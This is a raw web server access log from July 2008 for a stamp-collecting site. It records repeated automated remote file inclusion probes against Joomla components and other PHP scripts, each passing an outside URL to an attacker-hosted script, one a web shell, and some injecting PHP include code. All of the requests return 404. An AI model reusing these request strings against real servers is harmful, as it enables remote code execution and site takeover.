217.198.149.178 - - [20/Jul/2008:17:23:45 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.198.149.178 - - [20/Jul/2008:17:23:45 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:23:51 -0700] "GET /logs/access_080630.log//admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:23:51 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:23:58 -0700] "GET /logs/access_080526.log//admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
218.38.12.93 - - [20/Jul/2008:17:24:26 -0700] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
210.127.253.161 - - [20/Jul/2008:17:24:26 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.217.156.81 - - [20/Jul/2008:17:24:44 -0700] "GET /logs/access_080512.log//skin/zero_vote/error.php?dir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
217.217.156.81 - - [20/Jul/2008:17:24:44 -0700] "GET //skin/zero_vote/error.php?dir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:25:22 -0700] "GET /logs/access_080630.log//admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:25:22 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:25:22 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:25:25 -0700] "GET /logs/access_080526.log//admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:25:46 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:25:46 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:25:49 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:25:49 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:25:50 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:25:50 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:25:53 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:25:53 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:25:59 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:26:00 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:26:03 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/coi.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:26:03 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:27:21 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:17:27:35 -0700] "GET /logs/access_080630.log//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:17:27:35 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:17:27:35 -0700] "GET /logs/access_080630.log//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:17:27:35 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:17:27:35 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:17:27:36 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:17:27:38 -0700] "GET /logs/access_080630.log//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:17:27:38 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:17:27:38 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:17:27:51 -0700] "GET /logs/access_080630.log//include/bbs.lib.inc.php?site_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:17:27:51 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:17:27:51 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
24.222.199.148 - - [20/Jul/2008:17:28:08 -0700] "GET /logs/access_080428.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://realbori.com/bbs/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
24.222.199.148 - - [20/Jul/2008:17:28:08 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://realbori.com/bbs/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
24.222.199.148 - - [20/Jul/2008:17:28:08 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://realbori.com/bbs/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
24.222.199.148 - - [20/Jul/2008:17:28:09 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://realbori.com/bbs/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
63.247.139.189 - - [20/Jul/2008:17:28:22 -0700] "GET /logs/access_080630.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
63.247.139.189 - - [20/Jul/2008:17:28:22 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
63.247.139.189 - - [20/Jul/2008:17:28:23 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
85.214.73.149 - - [20/Jul/2008:17:28:48 -0700] "GET /logs/access_080428.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.73.149 - - [20/Jul/2008:17:28:48 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.214.73.149 - - [20/Jul/2008:17:28:49 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
217.199.218.32 - - [20/Jul/2008:17:28:52 -0700] "GET /logs/access_080428.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.199.218.32 - - [20/Jul/2008:17:28:53 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.199.218.32 - - [20/Jul/2008:17:28:53 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.214.73.149 - - [20/Jul/2008:17:28:54 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
217.199.218.32 - - [20/Jul/2008:17:28:59 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:17:29:46 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.246.91.250 - - [20/Jul/2008:17:29:48 -0700] "GET /logs/access_080616.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:17:29:51 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.120.241.242 - - [20/Jul/2008:17:29:53 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.246.31.225 - - [20/Jul/2008:17:30:02 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.44.230.33 - - [20/Jul/2008:17:32:21 -0700] "GET /logs/access_080331.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.198.149.178 - - [20/Jul/2008:17:33:17 -0700] "GET /logs/access_080428.log/convert/mvcw.php?step=1&vwar_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.19.74.194 - - [20/Jul/2008:17:33:36 -0700] "GET /logs/access_080428.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.19.74.194 - - [20/Jul/2008:17:33:36 -0700] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.19.74.194 - - [20/Jul/2008:17:33:36 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.86.134.34 - - [20/Jul/2008:17:33:54 -0700] "GET /logs/access_080428.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.86.134.34 - - [20/Jul/2008:17:33:54 -0700] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.86.134.34 - - [20/Jul/2008:17:33:54 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
87.244.11.20 - - [20/Jul/2008:17:34:25 -0700] "GET /logs/access_080428.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.244.11.20 - - [20/Jul/2008:17:34:34 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.244.11.20 - - [20/Jul/2008:17:34:41 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.19.74.194 - - [20/Jul/2008:17:35:38 -0700] "GET /logs/access_080505.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.86.134.34 - - [20/Jul/2008:17:35:41 -0700] "GET /logs/access_080505.log//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.86.134.34 - - [20/Jul/2008:17:36:50 -0700] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
87.244.11.20 - - [20/Jul/2008:17:36:58 -0700] "GET /logs/access_080407.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.127.253.161 - - [20/Jul/2008:17:36:59 -0700] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
75.125.201.18 - - [20/Jul/2008:17:38:08 -0700] "GET /%3Cbug%3Ehttp://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.mathstamps.com"
75.125.201.18 - - [20/Jul/2008:17:38:08 -0700] "GET /logs/%3Cbug%3Ehttp://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.mathstamps.com"
64.8.105.21 - - [20/Jul/2008:17:39:06 -0700] "GET /logs/access_080512.log//skin/zero_vote/error.php?dir=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.8.105.21 - - [20/Jul/2008:17:39:06 -0700] "GET //skin/zero_vote/error.php?dir=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.8.105.21 - - [20/Jul/2008:17:39:06 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.8.105.21 - - [20/Jul/2008:17:39:14 -0700] "GET /logs/access_080519.log//skin/zero_vote/error.php?dir=http://www.posejdon.ru/v6-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
70.86.134.34 - - [20/Jul/2008:17:41:11 -0700] "GET /logs/access_080519.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.86.134.34 - - [20/Jul/2008:17:41:11 -0700] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.86.134.34 - - [20/Jul/2008:17:41:11 -0700] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
216.104.34.70 - - [20/Jul/2008:17:41:52 -0700] "GET /errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.mathstamps.com"
216.104.34.70 - - [20/Jul/2008:17:41:53 -0700] "GET /logs/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.mathstamps.com"
69.72.153.58 - - [20/Jul/2008:17:43:09 -0700] "GET /logs/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.mathstamps.com"
70.86.134.34 - - [20/Jul/2008:17:44:28 -0700] "GET /logs/access_080505.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
62.212.130.170 - - [20/Jul/2008:17:46:21 -0700] "GET /errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.mathstamps.com"
168.209.97.42 - - [20/Jul/2008:17:50:03 -0700] "GET /logs/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.mathstamps.com"
168.209.97.42 - - [20/Jul/2008:17:50:03 -0700] "GET /errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.mathstamps.com"
216.104.34.70 - - [20/Jul/2008:17:53:16 -0700] "GET /index.php?filter=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.mathstamps.com"
216.104.34.70 - - [20/Jul/2008:17:53:17 -0700] "GET /logs/index.php?filter=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:17:54:04 -0700] "GET /logs/access_080616.log//components/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:17:54:05 -0700] "GET //components/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
72.29.87.80 - - [20/Jul/2008:17:54:05 -0700] "GET /logs//components/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
200.29.4.54 - - [20/Jul/2008:17:55:14 -0700] "GET /logs/access.log//classes/adodbt/sql.php?classes_dir=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.29.4.54 - - [20/Jul/2008:17:55:22 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.29.4.54 - - [20/Jul/2008:17:55:26 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.230.33 - - [20/Jul/2008:17:58:26 -0700] "GET /logs/access_080609.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
84.204.129.106 - - [20/Jul/2008:17:59:11 -0700] "GET /logs/http://cabinet-chapuis.info/graphisme/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.mathstamps.com"
195.39.5.203 - - [20/Jul/2008:18:01:09 -0700] "GET /logs/access_080630.log//include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.39.5.203 - - [20/Jul/2008:18:01:10 -0700] "GET //include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.39.5.203 - - [20/Jul/2008:18:01:10 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
